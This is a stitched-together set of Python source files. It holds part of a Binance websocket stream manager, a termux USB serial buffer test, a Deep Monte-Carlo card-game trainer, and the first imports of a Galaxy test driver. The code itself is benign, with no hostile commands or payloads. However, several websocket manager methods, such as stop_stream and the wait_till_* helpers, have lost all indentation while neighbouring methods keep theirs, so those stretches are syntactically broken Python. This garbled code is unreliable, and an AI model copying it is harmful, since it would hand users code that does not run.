    :param new_close_timeout: maximum wait time in seconds for completing the closing handshake;
                              passed through to `websockets.client.connect()`
    :type new_close_timeout: int or None
    :return: new_stream_id or 'False'
    """
    # start the replacement first, stop the old stream only after the new one runs
    new_stream_id = self.create_stream(new_channels,
                                       new_markets,
                                       new_stream_label,
                                       new_stream_buffer_name,
                                       new_api_key,
                                       new_api_secret,
                                       new_symbols,
                                       new_output,
                                       new_ping_interval,
                                       new_ping_timeout,
                                       new_close_timeout)
    if self.wait_till_stream_has_started(new_stream_id):
        self.stop_stream(stream_id)
    return new_stream_id
def run(self):
    """
    Overload of `threading.run()` - starts the management threads
    (frequent checks and keepalive).
    """
    for management_target in (self._frequent_checks, self._keepalive_streams):
        threading.Thread(target=management_target).start()
def set_private_dex_config(self, binance_dex_user_address):
    """
    Set the default Binance DEX user address.

    Once a websocket is created with this default value it can not be changed.
    If you plan to use different user addresses, do not use this method - pass
    the user address with create_stream() in the market parameter instead.

    :param binance_dex_user_address: Binance DEX user address
    :type binance_dex_user_address: str
    """
    self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
    """
    Record a heartbeat for a specific stream and mark it "running"
    (should only be called by the stream itself).
    :param stream_id: id of a stream
    :type stream_id: uuid
    """
    logging.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
    try:
        stream_record = self.stream_list[stream_id]
    except KeyError:
        # stream already removed - nothing to update
        return
    stream_record['last_heartbeat'] = time.time()
    stream_record['status'] = "running"
def set_ringbuffer_error_max_size(self, max_size):
    """
    Define how many error messages the error ringbuffer keeps.
    :param max_size: Max entries of error messages in the ringbuffer.
    :type max_size: int
    """
    self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
    """
    Define how many result messages the result ringbuffer keeps.
    :param max_size: Max entries of result messages in the ringbuffer.
    :type max_size: int
    """
    self.ringbuffer_result_max_size = int(max_size)
def set_stream_label(self, stream_id, stream_label=None):
    """
    Attach (or clear) a label on a stream, identified by its stream_id.
    :param stream_id: id of the stream
    :type stream_id: uuid
    :param stream_label: stream_label to set
    :type stream_label: str
    """
    self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
    """
    Define how many received_last_second entries are stored before deletion.
    :param number_of_max_entries: number of entries to keep in list
    :type number_of_max_entries: int
    """
    self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
    """
    Place a restart request for a specific stream.
    :param stream_id: id of the old stream
    :type stream_id: uuid
    :return: bool
    """
    self.restart_requests[stream_id] = {'status': "new"}
    return True
def split_payload(self, params, method, max_items_per_request=350):
    """
    Split a subscribe/unsubscribe payload into chunks.
    Sending more than 8000 chars via websocket.send() leads to a connection loss, 350 list elements is a good limit
    to keep the payload length under 8000 chars and avoid reconnects
    :param params: params of subscribe payload
    :type params: list
    :param method: SUBSCRIBE or UNSUBSCRIBE
    :type method: str
    :param max_items_per_request: max size for params, if more it gets splitted
    :return: list or False
    """
    if self.is_exchange_type('cex'):
        items = list(params)
        payload = []
        # Slice into chunks of exactly `max_items_per_request` items. The
        # previous counter-based loop had an off-by-one and produced chunks of
        # max_items_per_request + 1 items.
        for start in range(0, len(items), max_items_per_request):
            payload.append({"method": method,
                            "params": items[start:start + max_items_per_request],
                            "id": self.get_request_id()})
        return payload
    elif self.is_exchange_type('dex'):
        # NOTE(review): DEX payload splitting is not implemented - this
        # intentionally returns None (not False) like the original `pass`.
        return None
    else:
        return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
    """
    Start the monitoring API server in a background thread.
    Take a look into the
    `Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
    to see how this works!
    :param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
    :type host: str
    :param port: listening port number (default: 64201)
    :type port: int
    :param warn_on_update: set to `False` to disable the update warning
    :type warn_on_update: bool
    :return: bool
    """
    api_thread = threading.Thread(target=self._start_monitoring_api_thread,
                                  args=(host, port, warn_on_update))
    api_thread.start()
    return True
def stop_manager_with_all_streams(self):
    """
    Stop the BinanceWebSocketApiManager including all streams and management threads.
    """
    logging.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
                 "unicorn_binance_websocket_api_manager " + self.version + " ...")
    # signal every management thread to shut down
    self.stop_manager_request = True
    # request a stop (and listenKey deletion) for every known stream
    for stream_id in self.stream_list:
        self.stop_stream(stream_id)
    # finally shut down the monitoring API service
    self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logging.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream can not heal itself in cause of wrong parameter (wrong market, channel type) it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logging.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report with this call their shutdowns
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
    def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
        """
        Subscribe channels and/or markets to an existing stream

        If you provide one channel and one market, then every subscribed market is going to get added to the new channel
        and all subscribed channels are going to get added to the new market!

        `How are the parameter `channels` and `markets` used with
        `subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_

        :param stream_id: id of a stream
        :type stream_id: uuid
        :param channels: provide the channels you wish to stream
        :type channels: str, tuple, list, set
        :param markets: provide the markets you wish to stream
        :type markets: str, tuple, list, set
        :return: bool
        """
        # NOTE(review): the mutable `[]` defaults are only rebound below, never mutated
        # in place, so they are harmless here - `None` defaults would be more conventional.
        logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
                     ", " + str(markets) + ") started ...")
        # Normalize the arguments to plain lists so they can be merged below.
        try:
            if type(channels) is str:
                channels = [channels]
            if type(markets) is str:
                markets = [markets]
            if type(channels) is set:
                channels = list(channels)
            if type(markets) is set:
                markets = list(markets)
        except KeyError:
            # NOTE(review): the type checks above cannot raise KeyError themselves;
            # presumably this guarded a historic code path - confirm before removing.
            logging.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
                          ", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
            self.stream_is_stopping(stream_id)
            self.set_restart_request(stream_id)
            return False
        # Normalize the stream's stored subscription lists the same way.
        if type(self.stream_list[stream_id]['channels']) is str:
            self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
        if type(self.stream_list[stream_id]['markets']) is str:
            self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
        if type(self.stream_list[stream_id]['channels']) is set:
            self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
        if type(self.stream_list[stream_id]['markets']) is set:
            self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
        # Merge the new channels into the stored list, deduplicating via set().
        self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
        markets_new = []
        for market in markets:
            # Special array-stream names are kept verbatim; ordinary symbols are
            # upper-cased for DEX endpoints and lower-cased for CEX endpoints.
            if "!" in market \
                    or market == "allMiniTickers" \
                    or market == "allTickers" \
                    or market == "blockheight" \
                    or market == "$all":
                markets_new.append(market)
            else:
                if self.is_exchange_type('dex'):
                    markets_new.append(str(market).upper())
                elif self.is_exchange_type('cex'):
                    markets_new.append(str(market).lower())
        # Merge the new markets into the stored list, deduplicating via set().
        self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
        payload = self.create_payload(stream_id, "subscribe",
                                      channels=self.stream_list[stream_id]['channels'],
                                      markets=self.stream_list[stream_id]['markets'])
        self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
        # control subscription limit:
        # https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
        if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
            # Over the limit: mark the stream crashed instead of sending the payload.
            self.stop_stream_as_crash(stream_id)
            error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
                        "been exceeded!"
            logging.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
                             f"Info: {str(error_msg)}")
            self.stream_is_crashing(stream_id, error_msg)
            if self.throw_exception_if_unrepairable:
                raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
            return False
        # Queue the subscribe payload(s); the stream's socket worker sends them asynchronously.
        for item in payload:
            self.stream_list[stream_id]['payload'].append(item)
        logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
                     ", " + str(markets) + ") finished ...")
        return True
    def unsubscribe_from_stream(self, stream_id, channels=[], markets=[]):
        """
        Unsubscribe channels and/or markets to an existing stream

        If you provide one channel and one market, then all subscribed markets from the specific channel and all
        subscribed channels from the specific markets are going to be removed!

        `How are the parameter `channels` and `markets` used with
        `subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_

        :param stream_id: id of a stream
        :type stream_id: uuid
        :param channels: provide the channels you wish to stream
        :type channels: str, tuple, list, set
        :param markets: provide the markets you wish to stream
        :type markets: str, tuple, list, set
        :return: bool
        """
        # NOTE(review): the log messages below say "unsubscribe_to_stream" while the
        # method is named unsubscribe_from_stream - runtime strings, left unchanged.
        logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
                     ", " + str(markets) + ") started ...")
        # Normalize the arguments and the stream's stored lists to plain lists.
        if type(channels) is str:
            channels = [channels]
        if type(markets) is str:
            markets = [markets]
        if type(self.stream_list[stream_id]['channels']) is str:
            self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
        if type(self.stream_list[stream_id]['markets']) is str:
            self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
        # Drop each requested channel; unknown channels are ignored.
        for channel in channels:
            try:
                self.stream_list[stream_id]['channels'].remove(channel)
            except ValueError:
                pass
        for market in markets:
            # Markets that start with 41-43 alphanumeric chars are skipped -
            # presumably DEX wallet addresses that must stay subscribed;
            # TODO confirm (note: the pattern is unanchored at the end).
            if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
                try:
                    self.stream_list[stream_id]['markets'].remove(market)
                except ValueError:
                    pass
        payload = self.create_payload(stream_id, "unsubscribe",
                                      channels=channels, markets=markets)
        # Queue the unsubscribe payload(s); the stream's socket worker sends them asynchronously.
        for item in payload:
            self.stream_list[stream_id]['payload'].append(item)
        self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
        logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
                     ", " + str(markets) + ") finished ...")
        return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
usbtest_rw_buf.py | #!/usr/bin/env python
import logging
import threading
import time
from usblib import device_from_fd
from usblib import shell_usbdevice
from usblib import CP210xSerial
LOGGER = logging.getLogger(__name__)
# ----------------------------------------------------------------------------
def main(fd, debug=False):
    """Open the CP210x device behind *fd* and run the buffer test until done.

    :param fd: an already-opened USB device file descriptor (e.g. handed over
        by the termux-usb wrapper)
    :param debug: when True, drop into the interactive device shell first
    """
    dev = device_from_fd(fd)
    if debug:
        shell_usbdevice(fd, dev)
        print("\n", "#" * 40, "\n")
    print(dev)
    # Only the Silicon Labs CP210x USB-UART bridge is supported here.
    assert dev.idVendor == 0x10C4 and dev.idProduct == 0xEA60
    ser = CP210xSerial(dev, baudRate=115200)
    try:
        # mainly for baud rate
        ser.open(_async=True)
        # alternative: just poll read forever via ser.read_dump_forever()
        buf_test(ser)
    finally:
        # always release the device, even if the test raises
        ser.close()
def buf_test(ser):
    """Exercise the CP210xSerial ring buffer with a writer and a reader thread.

    A writer thread feeds synthetic data straight into ``ser._buf_in`` (so no
    real device traffic is needed), while one reader strategy drains it.  The
    alternative reader strategies are kept below as commented-out thread
    constructions - uncomment exactly one to try it.  Runs for ~30 seconds or
    until Ctrl-C.
    """
    # Shutdown flag shared with the worker closures; flipped to True at the end.
    stop = False
    def writer(delay):
        # Produce tokens like "a=0 b=1 ..." (newline after every 10th token),
        # one every `delay` seconds, directly into the input buffer.
        i = 0
        abc = "abcdefghijklmnopqrstuvwxyz"
        while not stop:
            ch = abc[i % len(abc)]
            nl = "\n" if i % 10 == 0 else " "
            data = "{}={}{}".format(ch, i, nl).encode("ascii")
            i += 1
            ser._buf_in.write(data)
            time.sleep(delay)
        print("write stopped")
    def dumper():
        # Drain the buffer in chunks, waiting on its condition variable while
        # empty - demonstrates the locking + notification mechanics.
        delay = 400.0 / 1000.0
        chunk_size = 100
        while not stop:
            if not ser._buf_in:
                # buffer truthiness presumably means "has data" - confirm in usblib
                print("wait ...")
                with ser._buf_in.changed:
                    notified = ser._buf_in.changed.wait(delay)
                    print(" notify:", notified)
            data = ser._buf_in.read(chunk_size)
            if not data:
                print(" no data")
                continue
            text = "".join(chr(v) for v in data)
            print(" data:", text, end="\n", flush=True)
        print("read stopped")
    def buf_reads(delay, chunk_size, timeout):
        # Exercise the public read() API with the given chunk size / timeout.
        while not stop:
            if not ser._buf_in:
                with ser._buf_in.changed:
                    notified = ser._buf_in.changed.wait(200 / 1000.0)
            data = ser.read(chunk_size, timeout)
            print(
                "read({}, {}): len:{}, data:{}".format(
                    chunk_size, timeout, len(data), bytes(data)
                )
            )
            time.sleep(delay)
        print("read stopped")
    def buf_read_util(delay, expected, chunk_size, timeout):
        # Exercise read_until(): read up to `expected` byte sequence.
        while not stop:
            if not ser._buf_in:
                with ser._buf_in.changed:
                    notified = ser._buf_in.changed.wait(200 / 1000.0)
            data = ser.read_until(expected, chunk_size, timeout)
            print(
                "read_until({}, {}, {}): len:{}, data:{}".format(
                    expected, chunk_size, timeout, len(data), bytes(data)
                )
            )
            time.sleep(delay)
        print("read stopped")
    def buf_read_util2(delay, expected, chunk_size, timeout):
        # Exercise read_until_or_none(): like read_until() but yields None
        # when the terminator was not found.
        while not stop:
            if not ser._buf_in:
                with ser._buf_in.changed:
                    notified = ser._buf_in.changed.wait(200 / 1000.0)
            data = ser.read_until_or_none(expected, chunk_size, timeout)
            if data is None:
                print(
                    "read_until({}, {}, {}): {}".format(
                        expected, chunk_size, timeout, data
                    )
                )
            else:
                print(
                    "read_until({}, {}, {}): len:{}, data:{}".format(
                        expected, chunk_size, timeout, len(data), bytes(data)
                    )
                )
            time.sleep(delay)
        print("read stopped")
    # dump all, shows locking+notificationd
    tr = threading.Thread(target=dumper)
    # buf reads, no-block
    # tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 100, 0))
    # buf reads, block, hangs on Stop ...
    # tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 25, None))
    # buf reads, timeout 3 sec, 25 chars
    # tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 25, 3000.0 / 1000.0))
    # buf reads, timeout 3 sec, any char len, mostly empty?
    # tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, None, 3000.0 / 1000.0))
    # until char \n, 3 sec, any size
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", None, 3000.0 / 1000.0))
    # until char \n, block, any size
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", None, None))
    # until char \n, block, 17 chars
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", 17, None))
    # until char \n, no-block, 17 chars
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", 17, 0))
    # until no char, 4 sec, 17 chars - always returns
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"", 17, 4000.0 / 1000.0))
    # until char "0\n", 4 sec, 17 chars
    # tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"0\n", 17, 4000.0 / 1000.0))
    # until char \n or none, 3 sec, any size
    # tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, 3000.0 / 1000.0))
    # until char \n or none, no-block, 17 chars - will always return if too
    # much data and immediate
    # tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", 17, 0))
    # until char \n or none, 3 sec, 33 chars,
    # fast return if size limit reached
    # tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", 33, 3000.0 / 1000.0))
    # until char \n or none, no-block, any size
    # fast return with None but sometimes result
    # tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, 0))
    # until char \n or none, block, any size
    # block until result or forever
    # tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, None))
    tw = threading.Thread(target=writer, args=(1000.0 / 1000.0,))
    tr.start()
    tw.start()
    # ser._buf_out.write(b"test\n")
    # time.sleep(1)
    # ser._buf_out.write(b"test 1\n")
    # time.sleep(1)
    # ser._buf_out.write(b"test 2\n")
    # time.sleep(1)
    try:
        time.sleep(30)
    except KeyboardInterrupt:
        pass
    # Rebinding `stop` here is visible to the closures above (shared cell).
    stop = True
    tw.join()
    tr.join()
    print("test done")
if __name__ == "__main__":
    # https://wiki.termux.com/wiki/Termux-usb
    logging.basicConfig(
        level=logging.INFO, format="[%(levelname).1s] %(name)s: %(message)s"
    )
    # Verbose logging for this script and the usblib stack, but keep the
    # chatty RX/TX byte-level logger at INFO.
    logging.getLogger(__name__).setLevel(logging.DEBUG)
    logging.getLogger("usblib").setLevel(logging.DEBUG)
    logging.getLogger("usblib.RXTX").setLevel(logging.INFO)
    logging.getLogger("usb").setLevel(logging.DEBUG)
    # grab fd number from args
    # (from termux wrapper - it passes an already-opened device fd as argv[1])
    import sys
    LOGGER.debug("args: %s", sys.argv)
    fd = int(sys.argv[1])
    main(fd)
|
trainer.py | # Copyright 2021 RLCard Team of Texas A&M University
# Copyright 2021 DouZero Team of Kwai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
import time
import timeit
import pprint
from collections import deque
import torch
from torch import multiprocessing as mp
from torch import nn
from .file_writer import FileWriter
from .model import DMCModel
from .utils import get_batch, create_buffers, create_optimizers, act, log
def compute_loss(logits, targets):
    """Mean squared error between value predictions and Monte-Carlo targets."""
    diff = logits - targets
    return torch.mean(diff * diff)
def learn(position,
          actor_models,
          agent,
          batch,
          optimizer,
          training_device,
          max_grad_norm,
          mean_episode_return_buf,
          lock):
    """Performs a learning (optimization) step.

    Runs one MSE regression step of ``agent`` on a flattened batch, then
    copies the updated weights into every actor model so the simulators act
    with the latest parameters.

    NOTE(review): ``training_device`` is unused - tensors are moved to a
    hard-coded CPU device below; confirm whether this is intentional
    (e.g. a CPU-only variant) or a leftover.
    """
    device = torch.device('cpu')
    # Collapse the (unroll_length, batch_size) leading dims into one.
    state = torch.flatten(batch['state'].to(device), 0, 1).float()
    action = torch.flatten(batch['action'].to(device), 0, 1).float()
    target = torch.flatten(batch['target'].to(device), 0, 1)
    # Only finished episodes contribute to the running mean-return statistic.
    episode_returns = batch['episode_return'][batch['done']]
    mean_episode_return_buf[position].append(torch.mean(episode_returns).to(device))
    # `lock` serializes updates of the shared learner model/optimizer state.
    with lock:
        values = agent.forward(state, action)
        loss = compute_loss(values, target)
        stats = {
            'mean_episode_return_'+str(position): torch.mean(torch.stack([_r for _r in mean_episode_return_buf[position]])).item(),
            'loss_'+str(position): loss.item(),
        }
        optimizer.zero_grad()
        loss.backward()
        nn.utils.clip_grad_norm_(agent.parameters(), max_grad_norm)
        optimizer.step()
        # Push the fresh weights to every actor model for this position.
        for actor_model in actor_models:
            actor_model.get_agent(position).load_state_dict(agent.state_dict())
        return stats
class DMCTrainer:
    """Deep Monte-Carlo trainer.

    Spawns actor processes (one group per simulation device) that fill
    shared-memory buffers with trajectories, plus learner threads that drain
    those buffers and update one agent per player position.
    """

    def __init__(self,
                 env,
                 load_model=False,
                 xpid='dmc',
                 save_interval=30,
                 num_actor_devices=1,
                 num_actors=5,
                 training_device=0,
                 savedir='experiments/dmc_result',
                 total_frames=100000000000,
                 exp_epsilon=0.01,
                 batch_size=32,
                 unroll_length=100,
                 num_buffers=50,
                 num_threads=4,
                 max_grad_norm=40,
                 learning_rate=0.0001,
                 alpha=0.99,
                 momentum=0,
                 epsilon=0.00001):
        '''
        Deep Monte-Carlo

        Args:
            env: RLCard environment
            load_model (boolean): Whether loading an existing model
            xpid (string): Experiment id (default: dmc)
            save_interval (int): Time interval (in minutes) at which to save the model
            num_actor_devices (int): The number of devices used for simulation
            num_actors (int): Number of actors for each simulation device
            training_device (int): The index of the GPU used for training models
            savedir (string): Root dir where experiment data will be saved
            total_frames (int): Total environment frames to train for
            exp_epsilon (float): The probability for exploration
            batch_size (int): Learner batch size
            unroll_length (int): The unroll length (time dimension)
            num_buffers (int): Number of shared-memory buffers
            num_threads (int): Number of learner threads
            max_grad_norm (int): Max norm of gradients
            learning_rate (float): Learning rate
            alpha (float): RMSProp smoothing constant
            momentum (float): RMSProp momentum
            epsilon (float): RMSProp epsilon
        '''
        self.env = env

        self.plogger = FileWriter(
            xpid=xpid,
            rootdir=savedir,
        )
        self.checkpointpath = os.path.expandvars(
            os.path.expanduser('%s/%s/%s' % (savedir, xpid, 'model.tar')))

        self.T = unroll_length
        self.B = batch_size

        self.xpid = xpid
        self.load_model = load_model
        self.savedir = savedir
        self.save_interval = save_interval
        self.num_actor_devices = num_actor_devices
        self.num_actors = num_actors
        self.training_device = training_device
        self.total_frames = total_frames
        self.exp_epsilon = exp_epsilon
        self.num_buffers = num_buffers
        self.num_threads = num_threads
        self.max_grad_norm = max_grad_norm
        self.learning_rate = learning_rate
        self.alpha = alpha
        self.momentum = momentum
        self.epsilon = epsilon

        self.action_shape = self.env.action_shape
        if self.action_shape[0] is None:  # One-hot encoding
            self.action_shape = [[self.env.num_actions] for _ in range(self.env.num_players)]

        # Rolling window of recent mean episode returns, one deque per position.
        self.mean_episode_return_buf = [deque(maxlen=100) for _ in range(self.env.num_players)]

    def start(self):
        """Run training: start actors and learner threads, checkpoint periodically."""
        # Initialize actor models (one shared-memory model per simulation device)
        models = []
        for device in range(self.num_actor_devices):
            model = DMCModel(self.env.state_shape,
                             self.action_shape,
                             exp_epsilon=self.exp_epsilon,
                             device=device)
            model.share_memory()
            model.eval()
            models.append(model)

        # Initialize shared-memory buffers
        buffers = create_buffers(self.T,
                                 self.num_buffers,
                                 self.env.state_shape,
                                 self.action_shape)

        # Initialize queues (per device, per player position)
        actor_processes = []
        ctx = mp.get_context('spawn')
        free_queue = []
        full_queue = []
        for device in range(self.num_actor_devices):
            _free_queue = [ctx.SimpleQueue() for _ in range(self.env.num_players)]
            _full_queue = [ctx.SimpleQueue() for _ in range(self.env.num_players)]
            free_queue.append(_free_queue)
            full_queue.append(_full_queue)

        # Learner model for training
        learner_model = DMCModel(self.env.state_shape,
                                 self.action_shape,
                                 device=self.training_device)

        # Create optimizers (one per player position)
        optimizers = create_optimizers(self.env.num_players,
                                       self.learning_rate,
                                       self.momentum,
                                       self.epsilon,
                                       self.alpha,
                                       learner_model)

        # Stat Keys
        stat_keys = []
        for p in range(self.env.num_players):
            stat_keys.append('mean_episode_return_'+str(p))
            stat_keys.append('loss_'+str(p))
        frames, stats = 0, {k: 0 for k in stat_keys}

        # Load checkpoint if requested and one exists
        if self.load_model and os.path.exists(self.checkpointpath):
            checkpoint_states = torch.load(
                self.checkpointpath, map_location="cuda:"+str(self.training_device)
            )
            for p in range(self.env.num_players):
                learner_model.get_agent(p).load_state_dict(checkpoint_states["model_state_dict"][p])
                optimizers[p].load_state_dict(checkpoint_states["optimizer_state_dict"][p])
                for device in range(self.num_actor_devices):
                    models[device].get_agent(p).load_state_dict(learner_model.get_agent(p).state_dict())
            stats = checkpoint_states["stats"]
            frames = checkpoint_states["frames"]
            log.info(f"Resuming preempted job, current stats:\n{stats}")

        # Starting actor processes
        for device in range(self.num_actor_devices):
            for i in range(self.num_actors):
                actor = ctx.Process(
                    target=act,
                    args=(i, device, self.T, free_queue[device], full_queue[device], models[device], buffers[device], self.env))
                actor.start()
                actor_processes.append(actor)

        def batch_and_learn(i, device, position, local_lock, position_lock, lock=threading.Lock()):
            """Thread target for the learning process."""
            # NOTE: the shared default `lock` is intentional - every learner
            # thread serializes updates of `frames`/`stats` through the same lock.
            nonlocal frames, stats
            while frames < self.total_frames:
                batch = get_batch(free_queue[device][position], full_queue[device][position], buffers[device][position], self.B, local_lock)
                _stats = learn(position, models, learner_model.get_agent(position), batch,
                               optimizers[position], self.training_device, self.max_grad_norm, self.mean_episode_return_buf, position_lock)
                with lock:
                    for k in _stats:
                        stats[k] = _stats[k]
                    to_log = dict(frames=frames)
                    to_log.update({k: stats[k] for k in stat_keys})
                    self.plogger.log(to_log)
                    frames += self.T * self.B

        # Hand every buffer index to the actors as initially free
        for device in range(self.num_actor_devices):
            for m in range(self.num_buffers):
                for p in range(self.env.num_players):
                    free_queue[device][p].put(m)

        # Start learner threads: num_threads per device per player position
        threads = []
        locks = [[threading.Lock() for _ in range(self.env.num_players)] for _ in range(self.num_actor_devices)]
        position_locks = [threading.Lock() for _ in range(self.env.num_players)]

        for device in range(self.num_actor_devices):
            for i in range(self.num_threads):
                for position in range(self.env.num_players):
                    thread = threading.Thread(
                        target=batch_and_learn, name='batch-and-learn-%d' % i, args=(i,device,position,locks[device][position],position_locks[position]))
                    thread.start()
                    threads.append(thread)

        def checkpoint(frames):
            # Persist learner weights + optimizer state for resuming, and a
            # standalone copy of each position's agent for evaluation.
            log.info('Saving checkpoint to %s', self.checkpointpath)
            _agents = learner_model.get_agents()
            torch.save({
                'model_state_dict': [_agent.state_dict() for _agent in _agents],
                'optimizer_state_dict': [optimizer.state_dict() for optimizer in optimizers],
                "stats": stats,
                'frames': frames,
            }, self.checkpointpath)
            # Save the weights for evaluation purpose
            for position in range(self.env.num_players):
                model_weights_dir = os.path.expandvars(os.path.expanduser(
                    '%s/%s/%s' % (self.savedir, self.xpid, str(position)+'_'+str(frames)+'.pth')))
                torch.save(learner_model.get_agent(position), model_weights_dir)

        timer = timeit.default_timer
        try:
            # Force an immediate first checkpoint opportunity.
            last_checkpoint_time = timer() - self.save_interval * 60
            while frames < self.total_frames:
                start_frames = frames
                start_time = timer()
                time.sleep(5)

                if timer() - last_checkpoint_time > self.save_interval * 60:
                    checkpoint(frames)
                    last_checkpoint_time = timer()

                end_time = timer()
                fps = (frames - start_frames) / (end_time - start_time)
                log.info('After %i frames: @ %.1f fps Stats:\n%s',
                         frames,
                         fps,
                         pprint.pformat(stats))
        except KeyboardInterrupt:
            return
        else:
            for thread in threads:
                thread.join()
            log.info('Learning finished after %d frames.', frames)

        checkpoint(frames)
        # Bugfix: `plogger` is an attribute of the trainer, not a local name -
        # the previous bare `plogger.close()` raised NameError here.
        self.plogger.close()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
